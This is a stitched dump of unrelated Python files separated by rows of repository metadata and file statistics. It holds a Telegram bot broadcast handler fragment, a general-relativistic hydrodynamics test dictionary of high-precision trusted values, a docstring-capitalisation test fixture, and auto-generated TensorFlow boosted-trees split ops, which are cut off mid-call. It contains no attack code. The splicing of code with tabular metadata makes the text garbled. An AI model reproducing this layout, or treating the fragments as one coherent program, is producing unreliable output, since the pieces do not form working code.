        await message.reply_text(f"✅ **broadcasted message in {sent} chats**")
        return
    if len(message.command) < 2:
        await message.reply_text(
            "**usage**:\n/broadcast (message)"
        )
        return
    text = message.text.split(None, 1)[1]
    sent = 0
    chats = []
    schats = await get_served_chats()
    for chat in schats:
        chats.append(int(chat["chat_id"]))
    for i in chats:
        try:
            await app.send_message(i, text=text)
            await asyncio.sleep(0.3)  # throttle to avoid flood limits
            sent += 1
        except Exception:
            pass
    # BUGFIX: the closing ** was missing, breaking the bold markup
    await message.reply_text(f"✅ **broadcasted message in {sent} chats**")
| 32.108911
| 117
| 0.559359
| 399
| 3,243
| 4.433584
| 0.185464
| 0.067835
| 0.047484
| 0.067835
| 0.859808
| 0.845676
| 0.804975
| 0.759751
| 0.759751
| 0.759751
| 0
| 0.011236
| 0.341351
| 3,243
| 100
| 118
| 32.43
| 0.814139
| 0
| 0
| 0.833333
| 0
| 0
| 0.098057
| 0.013568
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.083333
| 0.0625
| 0
| 0.104167
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
d5b68e12d86c5819f398ad988b111bab20fead06
| 9,180
|
py
|
Python
|
GRHD/tests/trusted_values_dict.py
|
kazewong/nrpytutorial
|
cc511325f37f01284b2b83584beb2a452556b3fb
|
[
"BSD-2-Clause"
] | null | null | null |
GRHD/tests/trusted_values_dict.py
|
kazewong/nrpytutorial
|
cc511325f37f01284b2b83584beb2a452556b3fb
|
[
"BSD-2-Clause"
] | null | null | null |
GRHD/tests/trusted_values_dict.py
|
kazewong/nrpytutorial
|
cc511325f37f01284b2b83584beb2a452556b3fb
|
[
"BSD-2-Clause"
] | null | null | null |
from mpmath import mpf, mp, mpc
from UnitTesting.standard_constants import precision

# Set the mpmath working precision (decimal digits) for the values below.
mp.dps = precision
# Regression baselines for unit tests, keyed '<module>__<test>__globals';
# the machine-generated entries are assigned below.
trusted_values_dict = {}
# Generated on: 2019-11-03
trusted_values_dict['GRHD__generate_everything_for_UnitTesting__globals'] = {'h': mpf('2.84243280229405600425249403342661'), 'T4UU[0][0]': mpf('-2.3394549490075809540461930203703'), 'T4UU[0][1]': mpf('2.67395385292607006300096827671274'), 'T4UU[0][2]': mpf('0.939965144645438226830568588005522'), 'T4UU[0][3]': mpf('2.76759751772851491817709721309086'), 'T4UU[1][0]': mpf('2.67395385292607006300096827671274'), 'T4UU[1][1]': mpf('1.337142166855083843704646689613'), 'T4UU[1][2]': mpf('-1.05274338618835252181323562334297'), 'T4UU[1][3]': mpf('-0.114576053158084857454893301538389'), 'T4UU[2][0]': mpf('0.939965144645438226830568588005522'), 'T4UU[2][1]': mpf('-1.05274338618835252181323562334297'), 'T4UU[2][2]': mpf('-1.73967973788547621712965727684179'), 'T4UU[2][3]': mpf('1.31193965191419717041027546492777'), 'T4UU[3][0]': mpf('2.76759751772851491817709721309086'), 'T4UU[3][1]': mpf('-0.114576053158084857454893301538389'), 'T4UU[3][2]': mpf('1.31193965191419717041027546492777'), 'T4UU[3][3]': mpf('-0.604443288062090381548088559383176'), 'T4UD[0][0]': mpf('2.83678720098084041181897447718178'), 'T4UD[0][1]': mpf('0.99170966488207307046536066168503'), 'T4UD[0][2]': mpf('0.762525527627034351734872841405493'), 'T4UD[0][3]': mpf('1.40532191994996256600264920622054'), 'T4UD[1][0]': mpf('4.07782527337238635619480920902476'), 'T4UD[1][1]': mpf('2.94854490474811274282398149678141'), 'T4UD[1][2]': mpf('1.58980034997723138677767026254494'), 'T4UD[1][3]': mpf('2.92997571782266354716522785610529'), 'T4UD[2][0]': mpf('0.956403288253138570605431528094272'), 'T4UD[2][1]': mpf('0.484936857671444533867069753417502'), 'T4UD[2][2]': mpf('1.25378321108003804346626910022637'), 'T4UD[2][3]': mpf('0.68718942651262182120233854959868'), 'T4UD[3][0]': mpf('3.97441194653789208190487363110243'), 'T4UD[3][1]': mpf('2.01519470302763230130899798219118'), 'T4UD[3][2]': mpf('1.54948313867655601527304818986326'), 'T4UD[3][3]': mpf('3.73658704274670027678199791929124'), 'sqrtgammaDET': mpc(real='0.0', 
imag='0.499945342870952602609690984536428'), 'rho_star': mpc(real='0.0', imag='0.0725005943667336311131421666686947'), 'tau_tilde': mpc(real='0.0', imag='-0.458495693184290897814747722804896'), 'S_tildeD[0]': mpc(real='0.0', imag='0.284825823209035045024961618764792'), 'S_tildeD[1]': mpc(real='0.0', imag='0.219002565786328373675928560260218'), 'S_tildeD[2]': mpc(real='0.0', imag='0.403618102049098426142847984010587'), 'vU[0]': mpf('2.08491426500127978299119146687954'), 'vU[1]': mpf('0.48899075489912636090236059520818'), 'vU[2]': mpf('2.03204100392352701089202910127997'), 'rho_star_fluxU[0]': mpc(real='0.0', imag='0.151157523416274364169709087946103'), 'rho_star_fluxU[1]': mpc(real='0.0', imag='0.0354521203700244244561012862959615'), 'rho_star_fluxU[2]': mpc(real='0.0', imag='0.147324180562029810603874580010597'), 'tau_tilde_fluxU[0]': mpc(real='0.0', imag='0.290027754433007156631418865799787'), 'tau_tilde_fluxU[1]': mpc(real='0.0', imag='0.11963611462522005801645264000399'), 'tau_tilde_fluxU[2]': mpc(real='0.0', imag='0.309311702850052328006569268836756'), 'S_tilde_fluxUD[0][0]': mpc(real='0.0', imag='0.846842336525531980129244402633049'), 'S_tilde_fluxUD[0][1]': mpc(real='0.0', imag='0.456601573479797240295852134295274'), 'S_tilde_fluxUD[0][2]': mpc(real='0.0', imag='0.841509138574907611385356176469941'), 'S_tilde_fluxUD[1][0]': mpc(real='0.0', imag='0.139277194305751167435758475221519'), 'S_tilde_fluxUD[1][1]': mpc(real='0.0', imag='0.360095144644984488380146103736479'), 'S_tilde_fluxUD[1][2]': mpc(real='0.0', imag='0.197365520411941247624909578917141'), 'S_tilde_fluxUD[2][0]': mpc(real='0.0', imag='0.578777751737032608581046133622294'), 'S_tilde_fluxUD[2][1]': mpc(real='0.0', imag='0.445022193642278962588676449740888'), 'S_tilde_fluxUD[2][2]': mpc(real='0.0', imag='1.07317344796584079880119588779053'), 's_source_term': mpc(real='0.0', imag='1.55110161502608523420576602802612'), 'g4DD_zerotimederiv_dD[0][0][0]': mpf('0.0'), 'g4DD_zerotimederiv_dD[0][0][1]': 
mpf('2.82453965193931811047726120763399'), 'g4DD_zerotimederiv_dD[0][0][2]': mpf('2.97270977531302812223533834423186'), 'g4DD_zerotimederiv_dD[0][0][3]': mpf('3.79847558081713850681325630682511'), 'g4DD_zerotimederiv_dD[0][1][0]': mpf('0.0'), 'g4DD_zerotimederiv_dD[0][1][1]': mpf('1.0146252791684529623495906608225'), 'g4DD_zerotimederiv_dD[0][1][2]': mpf('1.48255029867180718539104661334343'), 'g4DD_zerotimederiv_dD[0][1][3]': mpf('1.30149508798628607865498540480183'), 'g4DD_zerotimederiv_dD[0][2][0]': mpf('0.0'), 'g4DD_zerotimederiv_dD[0][2][1]': mpf('1.06823873665130213789461733131967'), 'g4DD_zerotimederiv_dD[0][2][2]': mpf('1.7249315550488847900098118758813'), 'g4DD_zerotimederiv_dD[0][2][3]': mpf('1.22349428638397231919749158107256'), 'g4DD_zerotimederiv_dD[0][3][0]': mpf('0.0'), 'g4DD_zerotimederiv_dD[0][3][1]': mpf('1.9841241069050865236076525529547'), 'g4DD_zerotimederiv_dD[0][3][2]': mpf('1.41428843593649790398494427617507'), 'g4DD_zerotimederiv_dD[0][3][3]': mpf('1.90602915532016463180382060987578'), 'g4DD_zerotimederiv_dD[1][0][0]': mpf('0.0'), 'g4DD_zerotimederiv_dD[1][0][1]': mpf('1.0146252791684529623495906608225'), 'g4DD_zerotimederiv_dD[1][0][2]': mpf('1.48255029867180718539104661334343'), 'g4DD_zerotimederiv_dD[1][0][3]': mpf('1.30149508798628607865498540480183'), 'g4DD_zerotimederiv_dD[1][1][0]': mpf('0.0'), 'g4DD_zerotimederiv_dD[1][1][1]': mpf('0.325289877717340858431782635307172'), 'g4DD_zerotimederiv_dD[1][1][2]': mpf('0.782429103366857114920662752410863'), 'g4DD_zerotimederiv_dD[1][1][3]': mpf('0.676632991755518276022485224530101'), 'g4DD_zerotimederiv_dD[1][2][0]': mpf('0.0'), 'g4DD_zerotimederiv_dD[1][2][1]': mpf('0.132730541646038369130167211551452'), 'g4DD_zerotimederiv_dD[1][2][2]': mpf('0.836312473789907029342316491238307'), 'g4DD_zerotimederiv_dD[1][2][3]': mpf('0.104922007479875012414538559823995'), 'g4DD_zerotimederiv_dD[1][3][0]': mpf('0.0'), 'g4DD_zerotimederiv_dD[1][3][1]': mpf('0.578414010116952703732806639891351'), 
'g4DD_zerotimederiv_dD[1][3][2]': mpf('0.348217748091978251956390977284173'), 'g4DD_zerotimederiv_dD[1][3][3]': mpf('0.520709874711556830462200196052436'), 'g4DD_zerotimederiv_dD[2][0][0]': mpf('0.0'), 'g4DD_zerotimederiv_dD[2][0][1]': mpf('1.06823873665130213789461733131967'), 'g4DD_zerotimederiv_dD[2][0][2]': mpf('1.7249315550488847900098118758813'), 'g4DD_zerotimederiv_dD[2][0][3]': mpf('1.22349428638397231919749158107256'), 'g4DD_zerotimederiv_dD[2][1][0]': mpf('0.0'), 'g4DD_zerotimederiv_dD[2][1][1]': mpf('0.132730541646038369130167211551452'), 'g4DD_zerotimederiv_dD[2][1][2]': mpf('0.836312473789907029342316491238307'), 'g4DD_zerotimederiv_dD[2][1][3]': mpf('0.104922007479875012414538559823995'), 'g4DD_zerotimederiv_dD[2][2][0]': mpf('0.0'), 'g4DD_zerotimederiv_dD[2][2][1]': mpf('0.0443395816572931256160927659948356'), 'g4DD_zerotimederiv_dD[2][2][2]': mpf('0.791773059231473563812642169068567'), 'g4DD_zerotimederiv_dD[2][2][3]': mpf('0.517764594846885084500343054969562'), 'g4DD_zerotimederiv_dD[2][3][0]': mpf('0.0'), 'g4DD_zerotimederiv_dD[2][3][1]': mpf('0.904353827541312105253723530040588'), 'g4DD_zerotimederiv_dD[2][3][2]': mpf('0.4205452593776550784809842298273'), 'g4DD_zerotimederiv_dD[2][3][3]': mpf('0.562906443041600756949094375158893'), 'g4DD_zerotimederiv_dD[3][0][0]': mpf('0.0'), 'g4DD_zerotimederiv_dD[3][0][1]': mpf('1.9841241069050865236076525529547'), 'g4DD_zerotimederiv_dD[3][0][2]': mpf('1.41428843593649790398494427617507'), 'g4DD_zerotimederiv_dD[3][0][3]': mpf('1.90602915532016463180382060987578'), 'g4DD_zerotimederiv_dD[3][1][0]': mpf('0.0'), 'g4DD_zerotimederiv_dD[3][1][1]': mpf('0.578414010116952703732806639891351'), 'g4DD_zerotimederiv_dD[3][1][2]': mpf('0.348217748091978251956390977284173'), 'g4DD_zerotimederiv_dD[3][1][3]': mpf('0.520709874711556830462200196052436'), 'g4DD_zerotimederiv_dD[3][2][0]': mpf('0.0'), 'g4DD_zerotimederiv_dD[3][2][1]': mpf('0.904353827541312105253723530040588'), 'g4DD_zerotimederiv_dD[3][2][2]': 
mpf('0.4205452593776550784809842298273'), 'g4DD_zerotimederiv_dD[3][2][3]': mpf('0.562906443041600756949094375158893'), 'g4DD_zerotimederiv_dD[3][3][0]': mpf('0.0'), 'g4DD_zerotimederiv_dD[3][3][1]': mpf('0.678164989824203701118676690384746'), 'g4DD_zerotimederiv_dD[3][3][2]': mpf('0.203532350493731639673455902084243'), 'g4DD_zerotimederiv_dD[3][3][3]': mpf('0.524827105700638063545682143740123'), 'S_tilde_source_termD[0]': mpc(real='0.0', imag='1.969921052719972420774752208672'), 'S_tilde_source_termD[1]': mpc(real='0.0', imag='1.55863129079179651981235110724811'), 'S_tilde_source_termD[2]': mpc(real='0.0', imag='1.68702250656213159629714937182143'), 'u4_ito_3velsU[0]': mpf('0.432128853048890200135067074902976'), 'u4_ito_3velsU[1]': mpc(real='-0.321573801881636534005792782409117', imag='0.389071962663702697327039459196385'), 'u4_ito_3velsU[2]': mpc(real='-0.126064400660481829019587962648075', imag='0.337957092011890836147358641028404'), 'u4_ito_3velsU[3]': mpc(real='-0.339556874473260328350932013563579', imag='0.590982571120743149784004799585091')}
| 1,020
| 9,021
| 0.754466
| 1,135
| 9,180
| 5.931278
| 0.127753
| 0.161616
| 0.18063
| 0.033422
| 0.4847
| 0.424688
| 0.411913
| 0.099228
| 0
| 0
| 0
| 0.491995
| 0.033769
| 9,180
| 8
| 9,022
| 1,147.5
| 0.266967
| 0.002614
| 0
| 0
| 1
| 0
| 0.756609
| 0.660149
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.4
| 0
| 0.4
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 10
|
d5d3bce0d28b9aea737852fdb206cfa5c7834869
| 455
|
py
|
Python
|
tests/data/format/capitalization_first_letter/class_docstring.py
|
DanielNoord/pydocstringformatter
|
a69302cee6bd32b9b5cc48912a47d0e8ad3f7abe
|
[
"MIT"
] | 4
|
2022-01-02T22:50:59.000Z
|
2022-02-09T09:04:37.000Z
|
tests/data/format/capitalization_first_letter/class_docstring.py
|
DanielNoord/pydocstringformatter
|
a69302cee6bd32b9b5cc48912a47d0e8ad3f7abe
|
[
"MIT"
] | 80
|
2022-01-02T09:02:50.000Z
|
2022-03-30T13:34:10.000Z
|
tests/data/format/capitalization_first_letter/class_docstring.py
|
DanielNoord/pydocstringformatter
|
a69302cee6bd32b9b5cc48912a47d0e8ad3f7abe
|
[
"MIT"
] | 2
|
2022-01-02T11:58:29.000Z
|
2022-01-04T18:53:29.000Z
|
class MyClass:
"""a multi-line
docstring"""
class InnerClass:
"""
a multi-line
docstring"""
class MyClass:
"""a multi-line
docstring
"""
class InnerClass:
"""a multi-line
docstring
"""
class MyClass:
"""
a docstring"""
class InnerClass:
"""
a docstring"""
class MyClass:
"""A docstring"""
class InnerClass:
"""A docstring"""
| 12.638889
| 25
| 0.492308
| 40
| 455
| 5.6
| 0.175
| 0.4375
| 0.232143
| 0.339286
| 1
| 1
| 1
| 1
| 1
| 0.638393
| 0
| 0
| 0.375824
| 455
| 35
| 26
| 13
| 0.788732
| 0.305495
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
|
0
| 12
|
d5e3e4b097597b68a5c78724a6fed223e61545a9
| 22,228
|
py
|
Python
|
Server/ChatBot/venv/Lib/site-packages/tensorflow/contrib/boosted_trees/python/ops/gen_split_handler_ops.py
|
sozuer53/BBC
|
31bb128cb1e1a19db955fd673d67cf0e92bac3a4
|
[
"Apache-2.0"
] | 3
|
2018-11-27T06:30:23.000Z
|
2021-05-30T15:56:32.000Z
|
Server/ChatBot/venv/Lib/site-packages/tensorflow/contrib/boosted_trees/python/ops/gen_split_handler_ops.py
|
sozuer53/BBC
|
31bb128cb1e1a19db955fd673d67cf0e92bac3a4
|
[
"Apache-2.0"
] | 3
|
2020-09-26T01:09:47.000Z
|
2022-02-10T02:12:08.000Z
|
Server/ChatBot/venv/Lib/site-packages/tensorflow/contrib/boosted_trees/python/ops/gen_split_handler_ops.py
|
sozuer53/BBC
|
31bb128cb1e1a19db955fd673d67cf0e92bac3a4
|
[
"Apache-2.0"
] | 6
|
2020-04-13T15:33:30.000Z
|
2020-06-21T19:26:55.000Z
|
"""Python wrappers around TensorFlow ops.
This file is MACHINE GENERATED! Do not edit.
"""
import collections as _collections
from tensorflow.python.eager import execute as _execute
from tensorflow.python.eager import context as _context
from tensorflow.python.eager import core as _core
from tensorflow.python.framework import dtypes as _dtypes
from tensorflow.python.framework import tensor_shape as _tensor_shape
from tensorflow.core.framework import op_def_pb2 as _op_def_pb2
# Needed to trigger the call to _set_call_cpp_shape_fn.
from tensorflow.python.framework import common_shapes as _common_shapes
from tensorflow.python.framework import op_def_registry as _op_def_registry
from tensorflow.python.framework import ops as _ops
from tensorflow.python.framework import op_def_library as _op_def_library
# Named output fields of the BuildCategoricalEqualitySplits op, wrapped in a
# namedtuple so callers can use attribute access on the result.
_build_categorical_equality_splits_outputs = ["output_partition_ids", "gains",
                                              "split_infos"]
_BuildCategoricalEqualitySplitsOutput = _collections.namedtuple(
    "BuildCategoricalEqualitySplits",
    _build_categorical_equality_splits_outputs)
# NOTE(review): this file is machine generated (see header); comments below
# are for readers only and will be lost on regeneration.
def build_categorical_equality_splits(num_minibatches, partition_ids, feature_ids, gradients, hessians, class_id, feature_column_group_id, bias_feature_id, l1_regularization, l2_regularization, tree_complexity_regularization, min_node_weight, multiclass_strategy, name=None):
  r"""Find the split that has the best gain for the accumulated stats.

  Args:
    num_minibatches: A `Tensor` of type `int64`.
      A scalar, the number of times per example gradients & hessians
      were accumulated. The stats are divided by this to get per example stats.
    partition_ids: A `Tensor` of type `int32`.
      A rank 1 tensor of partition IDs.
    feature_ids: A `Tensor` of type `int64`. A rank 1 tensor of feature IDs.
    gradients: A `Tensor` of type `float32`. A rank 1 tensor of gradients.
    hessians: A `Tensor` of type `float32`. A rank 1 tensor of hessians.
    class_id: A `Tensor` of type `int32`.
    feature_column_group_id: An `int`.
    bias_feature_id: An `int`.
    l1_regularization: A `float`.
    l2_regularization: A `float`.
    tree_complexity_regularization: A `float`.
    min_node_weight: A `float`.
    multiclass_strategy: An `int`.
    name: A name for the operation (optional).

  Returns:
    A tuple of `Tensor` objects (output_partition_ids, gains, split_infos).

    output_partition_ids: A `Tensor` of type `int32`. A rank 1 tensor, the partition IDs that we created splits
      for.
    gains: A `Tensor` of type `float32`. A rank 1 tensor, for the computed gain for the created splits.
    split_infos: A `Tensor` of type `string`. A rank 1 tensor of serialized protos which contains the
      `SplitInfo`s.
  """
  # Coerce attribute arguments to the exact Python types the op expects.
  feature_column_group_id = _execute.make_int(feature_column_group_id, "feature_column_group_id")
  bias_feature_id = _execute.make_int(bias_feature_id, "bias_feature_id")
  l1_regularization = _execute.make_float(l1_regularization, "l1_regularization")
  l2_regularization = _execute.make_float(l2_regularization, "l2_regularization")
  tree_complexity_regularization = _execute.make_float(tree_complexity_regularization, "tree_complexity_regularization")
  min_node_weight = _execute.make_float(min_node_weight, "min_node_weight")
  multiclass_strategy = _execute.make_int(multiclass_strategy, "multiclass_strategy")
  _ctx = _context.context()
  if _ctx.in_graph_mode():
    # Graph mode: add the op to the current graph and read the attrs back
    # from the created op for gradient recording.
    _, _, _op = _op_def_lib._apply_op_helper(
        "BuildCategoricalEqualitySplits", num_minibatches=num_minibatches,
        partition_ids=partition_ids, feature_ids=feature_ids,
        gradients=gradients, hessians=hessians, class_id=class_id,
        feature_column_group_id=feature_column_group_id,
        bias_feature_id=bias_feature_id, l1_regularization=l1_regularization,
        l2_regularization=l2_regularization,
        tree_complexity_regularization=tree_complexity_regularization,
        min_node_weight=min_node_weight,
        multiclass_strategy=multiclass_strategy, name=name)
    _result = _op.outputs[:]
    _inputs_flat = _op.inputs
    _attrs = ("feature_column_group_id",
              _op.get_attr("feature_column_group_id"), "bias_feature_id",
              _op.get_attr("bias_feature_id"), "l1_regularization",
              _op.get_attr("l1_regularization"), "l2_regularization",
              _op.get_attr("l2_regularization"),
              "tree_complexity_regularization",
              _op.get_attr("tree_complexity_regularization"),
              "min_node_weight", _op.get_attr("min_node_weight"),
              "multiclass_strategy", _op.get_attr("multiclass_strategy"))
  else:
    # Eager mode: convert inputs to tensors of the declared dtypes and
    # execute the kernel immediately (3 outputs).
    num_minibatches = _ops.convert_to_tensor(num_minibatches, _dtypes.int64)
    partition_ids = _ops.convert_to_tensor(partition_ids, _dtypes.int32)
    feature_ids = _ops.convert_to_tensor(feature_ids, _dtypes.int64)
    gradients = _ops.convert_to_tensor(gradients, _dtypes.float32)
    hessians = _ops.convert_to_tensor(hessians, _dtypes.float32)
    class_id = _ops.convert_to_tensor(class_id, _dtypes.int32)
    _inputs_flat = [num_minibatches, partition_ids, feature_ids, gradients, hessians, class_id]
    _attrs = ("feature_column_group_id", feature_column_group_id,
              "bias_feature_id", bias_feature_id, "l1_regularization",
              l1_regularization, "l2_regularization", l2_regularization,
              "tree_complexity_regularization",
              tree_complexity_regularization, "min_node_weight",
              min_node_weight, "multiclass_strategy", multiclass_strategy)
    _result = _execute.execute(b"BuildCategoricalEqualitySplits", 3,
                               inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
                               name=name)
  # Register the op invocation so gradients can flow through it.
  _execute.record_gradient(
      "BuildCategoricalEqualitySplits", _inputs_flat, _attrs, _result, name)
  _result = _BuildCategoricalEqualitySplitsOutput._make(_result)
  return _result
# Named output fields of the BuildDenseInequalitySplits op, wrapped in a
# namedtuple so callers can use attribute access on the result.
_build_dense_inequality_splits_outputs = ["output_partition_ids", "gains",
                                          "split_infos"]
_BuildDenseInequalitySplitsOutput = _collections.namedtuple(
    "BuildDenseInequalitySplits", _build_dense_inequality_splits_outputs)
def build_dense_inequality_splits(num_minibatches, partition_ids, bucket_ids, gradients, hessians, bucket_boundaries, class_id, feature_column_group_id, l1_regularization, l2_regularization, tree_complexity_regularization, min_node_weight, multiclass_strategy, name=None):
  r"""Find the split that has the best gain for the accumulated stats.

  NOTE: machine-generated op wrapper for `BuildDenseInequalitySplits`; the
  attr names/order below must match the registered op definition exactly.

  Args:
    num_minibatches: A `Tensor` of type `int64`.
      A scalar, the number of times per example gradients & hessians
      were accumulated. The stats are divided by this to get per example stats.
    partition_ids: A `Tensor` of type `int32`.
      A rank 1 tensor of partition IDs.
    bucket_ids: A `Tensor` of type `int64`. A rank 1 tensor of buckets IDs.
    gradients: A `Tensor` of type `float32`. A rank 1 tensor of gradients.
    hessians: A `Tensor` of type `float32`. A rank 1 tensor of hessians.
    bucket_boundaries: A `Tensor` of type `float32`.
      A rank 1 tensor, thresholds that were used for bucketization.
    class_id: A `Tensor` of type `int32`.
    feature_column_group_id: An `int`.
    l1_regularization: A `float`.
    l2_regularization: A `float`.
    tree_complexity_regularization: A `float`.
    min_node_weight: A `float`.
    multiclass_strategy: An `int`.
    name: A name for the operation (optional).

  Returns:
    A tuple of `Tensor` objects (output_partition_ids, gains, split_infos).

    output_partition_ids: A `Tensor` of type `int32`. A rank 1 tensor, the partition IDs that we created splits
      for.
    gains: A `Tensor` of type `float32`. A rank 1 tensor, for the computed gain for the created splits.
    split_infos: A `Tensor` of type `string`. A rank 1 tensor of serialized protos which contains the
      `SplitInfo`s.
  """
  # Coerce/validate the Python attribute values to the attr types declared
  # in the op def ("int" / "float"); raises if a value is not convertible.
  feature_column_group_id = _execute.make_int(feature_column_group_id, "feature_column_group_id")
  l1_regularization = _execute.make_float(l1_regularization, "l1_regularization")
  l2_regularization = _execute.make_float(l2_regularization, "l2_regularization")
  tree_complexity_regularization = _execute.make_float(tree_complexity_regularization, "tree_complexity_regularization")
  min_node_weight = _execute.make_float(min_node_weight, "min_node_weight")
  multiclass_strategy = _execute.make_int(multiclass_strategy, "multiclass_strategy")
  _ctx = _context.context()
  if _ctx.in_graph_mode():
    # Graph mode: create a graph node via the op-def library, then read the
    # resolved attrs back off the created op for gradient recording.
    _, _, _op = _op_def_lib._apply_op_helper(
        "BuildDenseInequalitySplits", num_minibatches=num_minibatches,
        partition_ids=partition_ids, bucket_ids=bucket_ids,
        gradients=gradients, hessians=hessians,
        bucket_boundaries=bucket_boundaries, class_id=class_id,
        feature_column_group_id=feature_column_group_id,
        l1_regularization=l1_regularization,
        l2_regularization=l2_regularization,
        tree_complexity_regularization=tree_complexity_regularization,
        min_node_weight=min_node_weight,
        multiclass_strategy=multiclass_strategy, name=name)
    _result = _op.outputs[:]
    _inputs_flat = _op.inputs
    _attrs = ("feature_column_group_id",
              _op.get_attr("feature_column_group_id"), "l1_regularization",
              _op.get_attr("l1_regularization"), "l2_regularization",
              _op.get_attr("l2_regularization"),
              "tree_complexity_regularization",
              _op.get_attr("tree_complexity_regularization"),
              "min_node_weight", _op.get_attr("min_node_weight"),
              "multiclass_strategy", _op.get_attr("multiclass_strategy"))
  else:
    # Eager mode: convert each input to a tensor of the dtype declared in
    # the op def, then execute the kernel directly (3 = number of outputs).
    num_minibatches = _ops.convert_to_tensor(num_minibatches, _dtypes.int64)
    partition_ids = _ops.convert_to_tensor(partition_ids, _dtypes.int32)
    bucket_ids = _ops.convert_to_tensor(bucket_ids, _dtypes.int64)
    gradients = _ops.convert_to_tensor(gradients, _dtypes.float32)
    hessians = _ops.convert_to_tensor(hessians, _dtypes.float32)
    bucket_boundaries = _ops.convert_to_tensor(bucket_boundaries, _dtypes.float32)
    class_id = _ops.convert_to_tensor(class_id, _dtypes.int32)
    _inputs_flat = [num_minibatches, partition_ids, bucket_ids, gradients, hessians, bucket_boundaries, class_id]
    _attrs = ("feature_column_group_id", feature_column_group_id,
              "l1_regularization", l1_regularization, "l2_regularization",
              l2_regularization, "tree_complexity_regularization",
              tree_complexity_regularization, "min_node_weight",
              min_node_weight, "multiclass_strategy", multiclass_strategy)
    _result = _execute.execute(b"BuildDenseInequalitySplits", 3,
                               inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
                               name=name)
  # Register the op invocation so gradients can be computed later.
  _execute.record_gradient(
      "BuildDenseInequalitySplits", _inputs_flat, _attrs, _result, name)
  # Wrap the flat output list in the named output tuple.
  _result = _BuildDenseInequalitySplitsOutput._make(_result)
  return _result
# Field names for the 3-tuple returned by build_sparse_inequality_splits;
# the namedtuple gives callers attribute access to the op's three outputs.
_build_sparse_inequality_splits_outputs = ["output_partition_ids", "gains",
                                          "split_infos"]
_BuildSparseInequalitySplitsOutput = _collections.namedtuple(
    "BuildSparseInequalitySplits", _build_sparse_inequality_splits_outputs)
def build_sparse_inequality_splits(num_minibatches, partition_ids, bucket_ids, gradients, hessians, bucket_boundaries, class_id, feature_column_group_id, bias_feature_id, l1_regularization, l2_regularization, tree_complexity_regularization, min_node_weight, multiclass_strategy, name=None):
  r"""Find the split that has the best gain for the accumulated stats.

  NOTE: machine-generated op wrapper for `BuildSparseInequalitySplits`; it
  mirrors build_dense_inequality_splits with one extra attr
  (`bias_feature_id`). The attr names/order must match the op definition.

  Args:
    num_minibatches: A `Tensor` of type `int64`.
      A scalar, the number of times per example gradients & hessians
      were accumulated. The stats are divided by this to get per example stats.
    partition_ids: A `Tensor` of type `int32`.
      A rank 1 tensor of partition IDs.
    bucket_ids: A `Tensor` of type `int64`. A rank 1 tensor of buckets IDs.
    gradients: A `Tensor` of type `float32`. A rank 1 tensor of gradients.
    hessians: A `Tensor` of type `float32`. A rank 1 tensor of hessians.
    bucket_boundaries: A `Tensor` of type `float32`.
      A rank 1 tensor, thresholds that were used for bucketization.
    class_id: A `Tensor` of type `int32`.
    feature_column_group_id: An `int`.
    bias_feature_id: An `int`.
    l1_regularization: A `float`.
    l2_regularization: A `float`.
    tree_complexity_regularization: A `float`.
    min_node_weight: A `float`.
    multiclass_strategy: An `int`.
    name: A name for the operation (optional).

  Returns:
    A tuple of `Tensor` objects (output_partition_ids, gains, split_infos).

    output_partition_ids: A `Tensor` of type `int32`. A rank 1 tensor, the partition IDs that we created splits
      for.
    gains: A `Tensor` of type `float32`. A rank 1 tensor, for the computed gain for the created splits.
    split_infos: A `Tensor` of type `string`. A rank 1 tensor of serialized protos which contains the
      `SplitInfo`s.
  """
  # Coerce/validate the Python attribute values to the attr types declared
  # in the op def ("int" / "float"); raises if a value is not convertible.
  feature_column_group_id = _execute.make_int(feature_column_group_id, "feature_column_group_id")
  bias_feature_id = _execute.make_int(bias_feature_id, "bias_feature_id")
  l1_regularization = _execute.make_float(l1_regularization, "l1_regularization")
  l2_regularization = _execute.make_float(l2_regularization, "l2_regularization")
  tree_complexity_regularization = _execute.make_float(tree_complexity_regularization, "tree_complexity_regularization")
  min_node_weight = _execute.make_float(min_node_weight, "min_node_weight")
  multiclass_strategy = _execute.make_int(multiclass_strategy, "multiclass_strategy")
  _ctx = _context.context()
  if _ctx.in_graph_mode():
    # Graph mode: create a graph node via the op-def library, then read the
    # resolved attrs back off the created op for gradient recording.
    _, _, _op = _op_def_lib._apply_op_helper(
        "BuildSparseInequalitySplits", num_minibatches=num_minibatches,
        partition_ids=partition_ids, bucket_ids=bucket_ids,
        gradients=gradients, hessians=hessians,
        bucket_boundaries=bucket_boundaries, class_id=class_id,
        feature_column_group_id=feature_column_group_id,
        bias_feature_id=bias_feature_id, l1_regularization=l1_regularization,
        l2_regularization=l2_regularization,
        tree_complexity_regularization=tree_complexity_regularization,
        min_node_weight=min_node_weight,
        multiclass_strategy=multiclass_strategy, name=name)
    _result = _op.outputs[:]
    _inputs_flat = _op.inputs
    _attrs = ("feature_column_group_id",
              _op.get_attr("feature_column_group_id"), "bias_feature_id",
              _op.get_attr("bias_feature_id"), "l1_regularization",
              _op.get_attr("l1_regularization"), "l2_regularization",
              _op.get_attr("l2_regularization"),
              "tree_complexity_regularization",
              _op.get_attr("tree_complexity_regularization"),
              "min_node_weight", _op.get_attr("min_node_weight"),
